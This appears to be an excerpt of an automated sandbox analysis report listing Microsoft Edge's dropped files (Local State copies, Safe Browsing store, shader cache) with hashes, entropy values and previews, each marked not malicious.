Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	13
Entropy (8bit):	2.7192945256669794
Encrypted:	false
SSDEEP:	3:NYLFRQI:ap2I
MD5:	BF16C04B916ACE92DB941EBB1AF3CB18
SHA1:	FA8DAEAE881F91F61EE0EE21BE5156255429AA8A
SHA-256:	7FC23C9028A316EC0AC25B09B5B0D61A1D21E58DFCF84C2A5F5B529129729098
SHA-512:	F0B7DF5517596B38D57C57B5777E008D6229AB5B1841BBE74602C77EEA2252BF644B8650C7642BD466213F62E15CC7AB5A95B28E26D3907260ED1B96A74B65FB
Malicious:	false
Preview:	117.0.2045.47

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Local State (copy)

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	44137
Entropy (8bit):	6.09077382521913
Encrypted:	false
SSDEEP:	768:zDXzgWPsj/qlGJqIY8GB4kkBMawuF9hDO6vP6O+Etbzy70FqHoPFkGoup1Xl3jVu:z/Ps+wsI7ynE86Btbz8hu3VlXr4CRo1
MD5:	E65E63CE074290A1176253D3DC12FE0C
SHA1:	B21C8707464B8255037F96404AE3F0211213F45E
SHA-256:	9B3A986430206BE9F656FC66DBF51E92A2835B0DE32F6D084FCE1E14A6F70639
SHA-512:	95CB71C0147A8E46C86E19502DCF718A399CEED18A565CDAC4FB03D6EA0F1CD9EF2DA8B6DB43A737508D11BE49E03E262CB9EB6483112895CFAECAE9A8B787F5
Malicious:	false
Preview:	{"abusive_adblocker_etag":"\"229EC35087C81534A88F41A12F3A505F330A0BE57C43F6CEB29F4718042EFC4F\"","desktop_mode":{"clear_prefs_once_applied":true,"is_on":false,"is_on_by_default_applied":true,"is_search_only_on_by_default_applied":true},"domain_actions_config":"H4sIAAAAAAAAAL19a4/cNpboXzH60+4gRbvbrzj7aTbj2Ql2MhlkswhwF4MGRVISWxQp81FVqkH++z2HUrXbLkndh51dBHba1XX4PDzvxz+v+P76VjipxG2teExe3YpWie7W7ZX3Wqqr7/55xYfBaMGjdjZcffc/8wdK3g4OPh+vvrv6aYg/pXj1zZV0PdcWPrEq1kYfmXD91W/fUEBCTFK7MEH+45urDKHVNLPlvXoIHMcB//3H/fX3uIk/T3v4HrcwfweHgL0EWPzVd9e/fXMlZE/dnTXjx+Pggvq74ePPisvx4bqD0bbZ2Og99K8w415b9RA4usTivgSy50f4WTHYRQE0r0TxkvcMIVQpvOHvmY4lkMdaWx3H0okPPIoWVi/cFl5uDqEbWICCMbxrAKlKh6lMUiL5PY4UWn5ggpcM0yp8Ynv4jYve2dLVCA978oD/ouXWKlM6jo08toiSpffjDoNXQdkYBpOKD3ffHgufVJtMKp0Vvs4+JS06uJShdJA/6dD+0Y6HVnm1TQAXSdJMDfEjnz/CJVxAPJh4Brj/5JJYZtZAI5d/gW/+WP9F7UWmyTTSsQFstY3KSrd5MJfw8x4ffriwzR5P5lZboOXq2cwPcaHxvO+5N1vU6gKw18K74OqIVMGrwcGWi+B3/fhgiJ2sSYzY4W5ZcE8FcFZJr/eKGfyLMJOray0KIOCL4cFk21LCwm0jIsXbWhuge7fO3sKot+GggT0

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Local State~RF35b40.TMP (copy)

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	44137
Entropy (8bit):	6.09077382521913
Encrypted:	false
SSDEEP:	768:zDXzgWPsj/qlGJqIY8GB4kkBMawuF9hDO6vP6O+Etbzy70FqHoPFkGoup1Xl3jVu:z/Ps+wsI7ynE86Btbz8hu3VlXr4CRo1
MD5:	E65E63CE074290A1176253D3DC12FE0C
SHA1:	B21C8707464B8255037F96404AE3F0211213F45E
SHA-256:	9B3A986430206BE9F656FC66DBF51E92A2835B0DE32F6D084FCE1E14A6F70639
SHA-512:	95CB71C0147A8E46C86E19502DCF718A399CEED18A565CDAC4FB03D6EA0F1CD9EF2DA8B6DB43A737508D11BE49E03E262CB9EB6483112895CFAECAE9A8B787F5
Malicious:	false
Preview:	{"abusive_adblocker_etag":"\"229EC35087C81534A88F41A12F3A505F330A0BE57C43F6CEB29F4718042EFC4F\"","desktop_mode":{"clear_prefs_once_applied":true,"is_on":false,"is_on_by_default_applied":true,"is_search_only_on_by_default_applied":true},"domain_actions_config":"H4sIAAAAAAAAAL19a4/cNpboXzH60+4gRbvbrzj7aTbj2Ql2MhlkswhwF4MGRVISWxQp81FVqkH++z2HUrXbLkndh51dBHba1XX4PDzvxz+v+P76VjipxG2teExe3YpWie7W7ZX3Wqqr7/55xYfBaMGjdjZcffc/8wdK3g4OPh+vvrv6aYg/pXj1zZV0PdcWPrEq1kYfmXD91W/fUEBCTFK7MEH+45urDKHVNLPlvXoIHMcB//3H/fX3uIk/T3v4HrcwfweHgL0EWPzVd9e/fXMlZE/dnTXjx+Pggvq74ePPisvx4bqD0bbZ2Og99K8w415b9RA4usTivgSy50f4WTHYRQE0r0TxkvcMIVQpvOHvmY4lkMdaWx3H0okPPIoWVi/cFl5uDqEbWICCMbxrAKlKh6lMUiL5PY4UWn5ggpcM0yp8Ynv4jYve2dLVCA978oD/ouXWKlM6jo08toiSpffjDoNXQdkYBpOKD3ffHgufVJtMKp0Vvs4+JS06uJShdJA/6dD+0Y6HVnm1TQAXSdJMDfEjnz/CJVxAPJh4Brj/5JJYZtZAI5d/gW/+WP9F7UWmyTTSsQFstY3KSrd5MJfw8x4ffriwzR5P5lZboOXq2cwPcaHxvO+5N1vU6gKw18K74OqIVMGrwcGWi+B3/fhgiJ2sSYzY4W5ZcE8FcFZJr/eKGfyLMJOray0KIOCL4cFk21LCwm0jIsXbWhuge7fO3sKot+GggT0

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Local State~RF35b50.TMP (copy)

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	44137
Entropy (8bit):	6.09077382521913
Encrypted:	false
SSDEEP:	768:zDXzgWPsj/qlGJqIY8GB4kkBMawuF9hDO6vP6O+Etbzy70FqHoPFkGoup1Xl3jVu:z/Ps+wsI7ynE86Btbz8hu3VlXr4CRo1
MD5:	E65E63CE074290A1176253D3DC12FE0C
SHA1:	B21C8707464B8255037F96404AE3F0211213F45E
SHA-256:	9B3A986430206BE9F656FC66DBF51E92A2835B0DE32F6D084FCE1E14A6F70639
SHA-512:	95CB71C0147A8E46C86E19502DCF718A399CEED18A565CDAC4FB03D6EA0F1CD9EF2DA8B6DB43A737508D11BE49E03E262CB9EB6483112895CFAECAE9A8B787F5
Malicious:	false
Preview:	{"abusive_adblocker_etag":"\"229EC35087C81534A88F41A12F3A505F330A0BE57C43F6CEB29F4718042EFC4F\"","desktop_mode":{"clear_prefs_once_applied":true,"is_on":false,"is_on_by_default_applied":true,"is_search_only_on_by_default_applied":true},"domain_actions_config":"H4sIAAAAAAAAAL19a4/cNpboXzH60+4gRbvbrzj7aTbj2Ql2MhlkswhwF4MGRVISWxQp81FVqkH++z2HUrXbLkndh51dBHba1XX4PDzvxz+v+P76VjipxG2teExe3YpWie7W7ZX3Wqqr7/55xYfBaMGjdjZcffc/8wdK3g4OPh+vvrv6aYg/pXj1zZV0PdcWPrEq1kYfmXD91W/fUEBCTFK7MEH+45urDKHVNLPlvXoIHMcB//3H/fX3uIk/T3v4HrcwfweHgL0EWPzVd9e/fXMlZE/dnTXjx+Pggvq74ePPisvx4bqD0bbZ2Og99K8w415b9RA4usTivgSy50f4WTHYRQE0r0TxkvcMIVQpvOHvmY4lkMdaWx3H0okPPIoWVi/cFl5uDqEbWICCMbxrAKlKh6lMUiL5PY4UWn5ggpcM0yp8Ynv4jYve2dLVCA978oD/ouXWKlM6jo08toiSpffjDoNXQdkYBpOKD3ffHgufVJtMKp0Vvs4+JS06uJShdJA/6dD+0Y6HVnm1TQAXSdJMDfEjnz/CJVxAPJh4Brj/5JJYZtZAI5d/gW/+WP9F7UWmyTTSsQFstY3KSrd5MJfw8x4ffriwzR5P5lZboOXq2cwPcaHxvO+5N1vU6gKw18K74OqIVMGrwcGWi+B3/fhgiJ2sSYzY4W5ZcE8FcFZJr/eKGfyLMJOray0KIOCL4cFk21LCwm0jIsXbWhuge7fO3sKot+GggT0

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Local State~RF35ce6.TMP (copy)

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	44137
Entropy (8bit):	6.09077382521913
Encrypted:	false
SSDEEP:	768:zDXzgWPsj/qlGJqIY8GB4kkBMawuF9hDO6vP6O+Etbzy70FqHoPFkGoup1Xl3jVu:z/Ps+wsI7ynE86Btbz8hu3VlXr4CRo1
MD5:	E65E63CE074290A1176253D3DC12FE0C
SHA1:	B21C8707464B8255037F96404AE3F0211213F45E
SHA-256:	9B3A986430206BE9F656FC66DBF51E92A2835B0DE32F6D084FCE1E14A6F70639
SHA-512:	95CB71C0147A8E46C86E19502DCF718A399CEED18A565CDAC4FB03D6EA0F1CD9EF2DA8B6DB43A737508D11BE49E03E262CB9EB6483112895CFAECAE9A8B787F5
Malicious:	false
Preview:	{"abusive_adblocker_etag":"\"229EC35087C81534A88F41A12F3A505F330A0BE57C43F6CEB29F4718042EFC4F\"","desktop_mode":{"clear_prefs_once_applied":true,"is_on":false,"is_on_by_default_applied":true,"is_search_only_on_by_default_applied":true},"domain_actions_config":"H4sIAAAAAAAAAL19a4/cNpboXzH60+4gRbvbrzj7aTbj2Ql2MhlkswhwF4MGRVISWxQp81FVqkH++z2HUrXbLkndh51dBHba1XX4PDzvxz+v+P76VjipxG2teExe3YpWie7W7ZX3Wqqr7/55xYfBaMGjdjZcffc/8wdK3g4OPh+vvrv6aYg/pXj1zZV0PdcWPrEq1kYfmXD91W/fUEBCTFK7MEH+45urDKHVNLPlvXoIHMcB//3H/fX3uIk/T3v4HrcwfweHgL0EWPzVd9e/fXMlZE/dnTXjx+Pggvq74ePPisvx4bqD0bbZ2Og99K8w415b9RA4usTivgSy50f4WTHYRQE0r0TxkvcMIVQpvOHvmY4lkMdaWx3H0okPPIoWVi/cFl5uDqEbWICCMbxrAKlKh6lMUiL5PY4UWn5ggpcM0yp8Ynv4jYve2dLVCA978oD/ouXWKlM6jo08toiSpffjDoNXQdkYBpOKD3ffHgufVJtMKp0Vvs4+JS06uJShdJA/6dD+0Y6HVnm1TQAXSdJMDfEjnz/CJVxAPJh4Brj/5JJYZtZAI5d/gW/+WP9F7UWmyTTSsQFstY3KSrd5MJfw8x4ffriwzR5P5lZboOXq2cwPcaHxvO+5N1vU6gKw18K74OqIVMGrwcGWi+B3/fhgiJ2sSYzY4W5ZcE8FcFZJr/eKGfyLMJOray0KIOCL4cFk21LCwm0jIsXbWhuge7fO3sKot+GggT0

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Local State~RF38398.TMP (copy)

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	44137
Entropy (8bit):	6.09077382521913
Encrypted:	false
SSDEEP:	768:zDXzgWPsj/qlGJqIY8GB4kkBMawuF9hDO6vP6O+Etbzy70FqHoPFkGoup1Xl3jVu:z/Ps+wsI7ynE86Btbz8hu3VlXr4CRo1
MD5:	E65E63CE074290A1176253D3DC12FE0C
SHA1:	B21C8707464B8255037F96404AE3F0211213F45E
SHA-256:	9B3A986430206BE9F656FC66DBF51E92A2835B0DE32F6D084FCE1E14A6F70639
SHA-512:	95CB71C0147A8E46C86E19502DCF718A399CEED18A565CDAC4FB03D6EA0F1CD9EF2DA8B6DB43A737508D11BE49E03E262CB9EB6483112895CFAECAE9A8B787F5
Malicious:	false
Preview:	{"abusive_adblocker_etag":"\"229EC35087C81534A88F41A12F3A505F330A0BE57C43F6CEB29F4718042EFC4F\"","desktop_mode":{"clear_prefs_once_applied":true,"is_on":false,"is_on_by_default_applied":true,"is_search_only_on_by_default_applied":true},"domain_actions_config":"H4sIAAAAAAAAAL19a4/cNpboXzH60+4gRbvbrzj7aTbj2Ql2MhlkswhwF4MGRVISWxQp81FVqkH++z2HUrXbLkndh51dBHba1XX4PDzvxz+v+P76VjipxG2teExe3YpWie7W7ZX3Wqqr7/55xYfBaMGjdjZcffc/8wdK3g4OPh+vvrv6aYg/pXj1zZV0PdcWPrEq1kYfmXD91W/fUEBCTFK7MEH+45urDKHVNLPlvXoIHMcB//3H/fX3uIk/T3v4HrcwfweHgL0EWPzVd9e/fXMlZE/dnTXjx+Pggvq74ePPisvx4bqD0bbZ2Og99K8w415b9RA4usTivgSy50f4WTHYRQE0r0TxkvcMIVQpvOHvmY4lkMdaWx3H0okPPIoWVi/cFl5uDqEbWICCMbxrAKlKh6lMUiL5PY4UWn5ggpcM0yp8Ynv4jYve2dLVCA978oD/ouXWKlM6jo08toiSpffjDoNXQdkYBpOKD3ffHgufVJtMKp0Vvs4+JS06uJShdJA/6dD+0Y6HVnm1TQAXSdJMDfEjnz/CJVxAPJh4Brj/5JJYZtZAI5d/gW/+WP9F7UWmyTTSsQFstY3KSrd5MJfw8x4ffriwzR5P5lZboOXq2cwPcaHxvO+5N1vU6gKw18K74OqIVMGrwcGWi+B3/fhgiJ2sSYzY4W5ZcE8FcFZJr/eKGfyLMJOray0KIOCL4cFk21LCwm0jIsXbWhuge7fO3sKot+GggT0

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Local State~RF3af6b.TMP (copy)

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	44137
Entropy (8bit):	6.09077382521913
Encrypted:	false
SSDEEP:	768:zDXzgWPsj/qlGJqIY8GB4kkBMawuF9hDO6vP6O+Etbzy70FqHoPFkGoup1Xl3jVu:z/Ps+wsI7ynE86Btbz8hu3VlXr4CRo1
MD5:	E65E63CE074290A1176253D3DC12FE0C
SHA1:	B21C8707464B8255037F96404AE3F0211213F45E
SHA-256:	9B3A986430206BE9F656FC66DBF51E92A2835B0DE32F6D084FCE1E14A6F70639
SHA-512:	95CB71C0147A8E46C86E19502DCF718A399CEED18A565CDAC4FB03D6EA0F1CD9EF2DA8B6DB43A737508D11BE49E03E262CB9EB6483112895CFAECAE9A8B787F5
Malicious:	false
Preview:	{"abusive_adblocker_etag":"\"229EC35087C81534A88F41A12F3A505F330A0BE57C43F6CEB29F4718042EFC4F\"","desktop_mode":{"clear_prefs_once_applied":true,"is_on":false,"is_on_by_default_applied":true,"is_search_only_on_by_default_applied":true},"domain_actions_config":"H4sIAAAAAAAAAL19a4/cNpboXzH60+4gRbvbrzj7aTbj2Ql2MhlkswhwF4MGRVISWxQp81FVqkH++z2HUrXbLkndh51dBHba1XX4PDzvxz+v+P76VjipxG2teExe3YpWie7W7ZX3Wqqr7/55xYfBaMGjdjZcffc/8wdK3g4OPh+vvrv6aYg/pXj1zZV0PdcWPrEq1kYfmXD91W/fUEBCTFK7MEH+45urDKHVNLPlvXoIHMcB//3H/fX3uIk/T3v4HrcwfweHgL0EWPzVd9e/fXMlZE/dnTXjx+Pggvq74ePPisvx4bqD0bbZ2Og99K8w415b9RA4usTivgSy50f4WTHYRQE0r0TxkvcMIVQpvOHvmY4lkMdaWx3H0okPPIoWVi/cFl5uDqEbWICCMbxrAKlKh6lMUiL5PY4UWn5ggpcM0yp8Ynv4jYve2dLVCA978oD/ouXWKlM6jo08toiSpffjDoNXQdkYBpOKD3ffHgufVJtMKp0Vvs4+JS06uJShdJA/6dD+0Y6HVnm1TQAXSdJMDfEjnz/CJVxAPJh4Brj/5JJYZtZAI5d/gW/+WP9F7UWmyTTSsQFstY3KSrd5MJfw8x4ffriwzR5P5lZboOXq2cwPcaHxvO+5N1vU6gKw18K74OqIVMGrwcGWi+B3/fhgiJ2sSYzY4W5ZcE8FcFZJr/eKGfyLMJOray0KIOCL4cFk21LCwm0jIsXbWhuge7fO3sKot+GggT0

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Local State~RF46daa.TMP (copy)

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	44137
Entropy (8bit):	6.09077382521913
Encrypted:	false
SSDEEP:	768:zDXzgWPsj/qlGJqIY8GB4kkBMawuF9hDO6vP6O+Etbzy70FqHoPFkGoup1Xl3jVu:z/Ps+wsI7ynE86Btbz8hu3VlXr4CRo1
MD5:	E65E63CE074290A1176253D3DC12FE0C
SHA1:	B21C8707464B8255037F96404AE3F0211213F45E
SHA-256:	9B3A986430206BE9F656FC66DBF51E92A2835B0DE32F6D084FCE1E14A6F70639
SHA-512:	95CB71C0147A8E46C86E19502DCF718A399CEED18A565CDAC4FB03D6EA0F1CD9EF2DA8B6DB43A737508D11BE49E03E262CB9EB6483112895CFAECAE9A8B787F5
Malicious:	false
Preview:	{"abusive_adblocker_etag":"\"229EC35087C81534A88F41A12F3A505F330A0BE57C43F6CEB29F4718042EFC4F\"","desktop_mode":{"clear_prefs_once_applied":true,"is_on":false,"is_on_by_default_applied":true,"is_search_only_on_by_default_applied":true},"domain_actions_config":"H4sIAAAAAAAAAL19a4/cNpboXzH60+4gRbvbrzj7aTbj2Ql2MhlkswhwF4MGRVISWxQp81FVqkH++z2HUrXbLkndh51dBHba1XX4PDzvxz+v+P76VjipxG2teExe3YpWie7W7ZX3Wqqr7/55xYfBaMGjdjZcffc/8wdK3g4OPh+vvrv6aYg/pXj1zZV0PdcWPrEq1kYfmXD91W/fUEBCTFK7MEH+45urDKHVNLPlvXoIHMcB//3H/fX3uIk/T3v4HrcwfweHgL0EWPzVd9e/fXMlZE/dnTXjx+Pggvq74ePPisvx4bqD0bbZ2Og99K8w415b9RA4usTivgSy50f4WTHYRQE0r0TxkvcMIVQpvOHvmY4lkMdaWx3H0okPPIoWVi/cFl5uDqEbWICCMbxrAKlKh6lMUiL5PY4UWn5ggpcM0yp8Ynv4jYve2dLVCA978oD/ouXWKlM6jo08toiSpffjDoNXQdkYBpOKD3ffHgufVJtMKp0Vvs4+JS06uJShdJA/6dD+0Y6HVnm1TQAXSdJMDfEjnz/CJVxAPJh4Brj/5JJYZtZAI5d/gW/+WP9F7UWmyTTSsQFstY3KSrd5MJfw8x4ffriwzR5P5lZboOXq2cwPcaHxvO+5N1vU6gKw18K74OqIVMGrwcGWi+B3/fhgiJ2sSYzY4W5ZcE8FcFZJr/eKGfyLMJOray0KIOCL4cFk21LCwm0jIsXbWhuge7fO3sKot+GggT0

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Local State~RF4cb5b.TMP (copy)

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	44137
Entropy (8bit):	6.09077382521913
Encrypted:	false
SSDEEP:	768:zDXzgWPsj/qlGJqIY8GB4kkBMawuF9hDO6vP6O+Etbzy70FqHoPFkGoup1Xl3jVu:z/Ps+wsI7ynE86Btbz8hu3VlXr4CRo1
MD5:	E65E63CE074290A1176253D3DC12FE0C
SHA1:	B21C8707464B8255037F96404AE3F0211213F45E
SHA-256:	9B3A986430206BE9F656FC66DBF51E92A2835B0DE32F6D084FCE1E14A6F70639
SHA-512:	95CB71C0147A8E46C86E19502DCF718A399CEED18A565CDAC4FB03D6EA0F1CD9EF2DA8B6DB43A737508D11BE49E03E262CB9EB6483112895CFAECAE9A8B787F5
Malicious:	false
Preview:	{"abusive_adblocker_etag":"\"229EC35087C81534A88F41A12F3A505F330A0BE57C43F6CEB29F4718042EFC4F\"","desktop_mode":{"clear_prefs_once_applied":true,"is_on":false,"is_on_by_default_applied":true,"is_search_only_on_by_default_applied":true},"domain_actions_config":"H4sIAAAAAAAAAL19a4/cNpboXzH60+4gRbvbrzj7aTbj2Ql2MhlkswhwF4MGRVISWxQp81FVqkH++z2HUrXbLkndh51dBHba1XX4PDzvxz+v+P76VjipxG2teExe3YpWie7W7ZX3Wqqr7/55xYfBaMGjdjZcffc/8wdK3g4OPh+vvrv6aYg/pXj1zZV0PdcWPrEq1kYfmXD91W/fUEBCTFK7MEH+45urDKHVNLPlvXoIHMcB//3H/fX3uIk/T3v4HrcwfweHgL0EWPzVd9e/fXMlZE/dnTXjx+Pggvq74ePPisvx4bqD0bbZ2Og99K8w415b9RA4usTivgSy50f4WTHYRQE0r0TxkvcMIVQpvOHvmY4lkMdaWx3H0okPPIoWVi/cFl5uDqEbWICCMbxrAKlKh6lMUiL5PY4UWn5ggpcM0yp8Ynv4jYve2dLVCA978oD/ouXWKlM6jo08toiSpffjDoNXQdkYBpOKD3ffHgufVJtMKp0Vvs4+JS06uJShdJA/6dD+0Y6HVnm1TQAXSdJMDfEjnz/CJVxAPJh4Brj/5JJYZtZAI5d/gW/+WP9F7UWmyTTSsQFstY3KSrd5MJfw8x4ffriwzR5P5lZboOXq2cwPcaHxvO+5N1vU6gKw18K74OqIVMGrwcGWi+B3/fhgiJ2sSYzY4W5ZcE8FcFZJr/eKGfyLMJOray0KIOCL4cFk21LCwm0jIsXbWhuge7fO3sKot+GggT0

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Nurturing\campaign_history

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	SQLite 3.x database, last written using SQLite version 3042000, file counter 6, database pages 5, cookie 0x2, schema 4, UTF-8, version-valid-for 6
Category:	dropped
Size (bytes):	20480
Entropy (8bit):	0.6773696719930975
Encrypted:	false
SSDEEP:	12:TLpUAFUxOUDaabZXiDiIF8izX4fhhdWeci2oesJaYi3islRud6zcQAJmdngzQdoO:TLiOUOq0afDdWec9sJhOs3fsuZ7J5fc
MD5:	6FFCCB198DC6B17E165460E6E246B03C
SHA1:	014A46B0E6E84089E1C20FA232F54CA737D5F023
SHA-256:	D1B2EC8C9906C3418837FFB8E116AA59C026DE2D67B2AFDA956F14D0DC3851AF
SHA-512:	846AE3D0A49A14BF82203A0FEDAD6E794F7E68C22A40EE0E014FEA99DFC676FAE4AFEB2C56F324E4361E83A35458C63E2ABAA7B28B6D23B20FA29EF47CBE87B3
Malicious:	false
Preview:	SQLite format 3......@ ..........................................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Safe Browsing\ChromeExtMalware.store (copy)

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	data
Category:	dropped
Size (bytes):	2036049
Entropy (8bit):	4.001521120206933
Encrypted:	false
SSDEEP:	49152:cPofaNEMRzlPjTPWqhh+hiKH4JxA8QdLRSKj4oHDBZOb0JUpayy3JVIhw8Kb0aHG:E
MD5:	3C1CB2C58B8327B4F3BADCF546458F07
SHA1:	7199215CFD8F23BD7B358FAED11486ACFD7B4078
SHA-256:	C6DC15316FF3B3202CBD18FC1DBCA0847E697AE83BDA819AEE60EBE249E3BB26
SHA-512:	A4B5903E25DC5C92C38918A9C04E0814E4B978F0C81777CCA8F2B376D8B84B9919B64F50E1FB2A0C5DA4BCD9215E19707EEE77A7507A59240ECD7C2C994062CF
Malicious:	false
Preview:	........\| .*..\|.....\|. ...\|aaaaagfgdnjcdkncmfkfinnjaiapdblgaaaaaogokkamlflcoccdihncmbgcmflnaaaaaoipnhppjgickhnmdbgfbicakiamaaaaapdcjfaomkafnbpoclmfakjianjdaaaaapiecopgelmleoolpjapkgpglkcbaaaabcdhikdcpainmmjceakmkacogdkoaaaabdgnnajpalbdkkdnknbbbmndbilaaaaabfkbnfjnjldicllofdmjchdancccaaaabgphkbebbdbcibgbppdidkelfoigaaaabibhgjnbdelbcijfciclijhdkgohaaaabmldebjdieoplgdecloipkabiibcaaaaboojhahjgdjeknnemneiajjhhddiaaaabpccljmmhilhhndnjkobdedbpkjpaaaacmnkhlfjgehagffhnhdjfankefglaaaacnnimempmlomnnhdkimkfahjplfpaaaadbhonifkcheeddllhmpapnhcpgiaaaaadbkccgigjdmfmdhgikcckicldhjbaaaadbolalgmogecpogmlebfkpigmpdjaaaaehbfjkafkfgppkjageehakfakfbmaaaaehbppmedegafehiimempeifadcinaaaageoepbmnopkkfeadndbijdghellgaaaagfdmgcibcnlmgiipapnfocaocfneaaaagjojmcedjoignaljgmnihajfhhlpaaaaglldojfgdeaijnfefaggkfjekomeaaaaiihjniipljfegaknmbkneamnoajdaaaainjigbjlofcjekbnjnpiegecbnbaaaaaiognmpgbjoffachmpnnppfnokcbeaaaajcpbcbckoiafnblkdhnldokclbhiaaaajfoihhopfmnlhlnlhogjonmllocoaaaajhoimomebpcfopjpgkbbjdnldoihaaaakdafje

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Safe Browsing\ChromeExtMalware.store_new

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	data
Category:	dropped
Size (bytes):	2036049
Entropy (8bit):	4.001521120206933
Encrypted:	false
SSDEEP:	49152:cPofaNEMRzlPjTPWqhh+hiKH4JxA8QdLRSKj4oHDBZOb0JUpayy3JVIhw8Kb0aHG:E
MD5:	3C1CB2C58B8327B4F3BADCF546458F07
SHA1:	7199215CFD8F23BD7B358FAED11486ACFD7B4078
SHA-256:	C6DC15316FF3B3202CBD18FC1DBCA0847E697AE83BDA819AEE60EBE249E3BB26
SHA-512:	A4B5903E25DC5C92C38918A9C04E0814E4B978F0C81777CCA8F2B376D8B84B9919B64F50E1FB2A0C5DA4BCD9215E19707EEE77A7507A59240ECD7C2C994062CF
Malicious:	false
Preview:	........\| .*..\|.....\|. ...\|aaaaagfgdnjcdkncmfkfinnjaiapdblgaaaaaogokkamlflcoccdihncmbgcmflnaaaaaoipnhppjgickhnmdbgfbicakiamaaaaapdcjfaomkafnbpoclmfakjianjdaaaaapiecopgelmleoolpjapkgpglkcbaaaabcdhikdcpainmmjceakmkacogdkoaaaabdgnnajpalbdkkdnknbbbmndbilaaaaabfkbnfjnjldicllofdmjchdancccaaaabgphkbebbdbcibgbppdidkelfoigaaaabibhgjnbdelbcijfciclijhdkgohaaaabmldebjdieoplgdecloipkabiibcaaaaboojhahjgdjeknnemneiajjhhddiaaaabpccljmmhilhhndnjkobdedbpkjpaaaacmnkhlfjgehagffhnhdjfankefglaaaacnnimempmlomnnhdkimkfahjplfpaaaadbhonifkcheeddllhmpapnhcpgiaaaaadbkccgigjdmfmdhgikcckicldhjbaaaadbolalgmogecpogmlebfkpigmpdjaaaaehbfjkafkfgppkjageehakfakfbmaaaaehbppmedegafehiimempeifadcinaaaageoepbmnopkkfeadndbijdghellgaaaagfdmgcibcnlmgiipapnfocaocfneaaaagjojmcedjoignaljgmnihajfhhlpaaaaglldojfgdeaijnfefaggkfjekomeaaaaiihjniipljfegaknmbkneamnoajdaaaainjigbjlofcjekbnjnpiegecbnbaaaaaiognmpgbjoffachmpnnppfnokcbeaaaajcpbcbckoiafnblkdhnldokclbhiaaaajfoihhopfmnlhlnlhogjonmllocoaaaajhoimomebpcfopjpgkbbjdnldoihaaaakdafje

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\ShaderCache\data_0

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	FoxPro FPT, blocks size 512, next free block index 3284796609, field type 0
Category:	dropped
Size (bytes):	8192
Entropy (8bit):	0.01057775872642915
Encrypted:	false
SSDEEP:	3:MsFl:/F
MD5:	CF89D16BB9107C631DAABF0C0EE58EFB
SHA1:	3AE5D3A7CF1F94A56E42F9A58D90A0B9616AE74B
SHA-256:	D6A5FE39CD672781B256E0E3102F7022635F1D4BB7CFCC90A80FFFE4D0F3877E
SHA-512:	8CB5B059C8105EB91E74A7D5952437AAA1ADA89763C5843E7B0F1B93D9EBE15ED40F287C652229291FAC02D712CF7FF5ECECEF276BA0D7DDC35558A3EC3F77B0
Malicious:	false
Preview:	............$...........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\ShaderCache\data_1

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	data
Category:	dropped
Size (bytes):	270336
Entropy (8bit):	0.0018238520723782249
Encrypted:	false
SSDEEP:	3:MsEllllkEthXllkl2zEflwKl//:/M/xT02zRe
MD5:	63B97E11FBDA46435BA9DE6195A75326
SHA1:	74D6374686AE878E446754FB8053DED181372711
SHA-256:	08D204BA0F10B84F0FC92C8995E3B99B2AB93A99463BAB5607AE1C5FFAF6B343
SHA-512:	2558A443B6BEBD2DF96756CFA4AF44F5CADAC33BE8D218A9D17C6E1FDD443A4CDF335656BB38B6C4278D2B103F672CE92886937F45D63908F32D576E46EC81F5
Malicious:	false
Preview:	........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\ShaderCache\data_2

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	data
Category:	dropped
Size (bytes):	8192
Entropy (8bit):	0.011852361981932763
Encrypted:	false
SSDEEP:	3:MsHlDll:/H
MD5:	0962291D6D367570BEE5454721C17E11
SHA1:	59D10A893EF321A706A9255176761366115BEDCB
SHA-256:	EC1702806F4CC7C42A82FC2B38E89835FDE7C64BB32060E0823C9077CA92EFB7
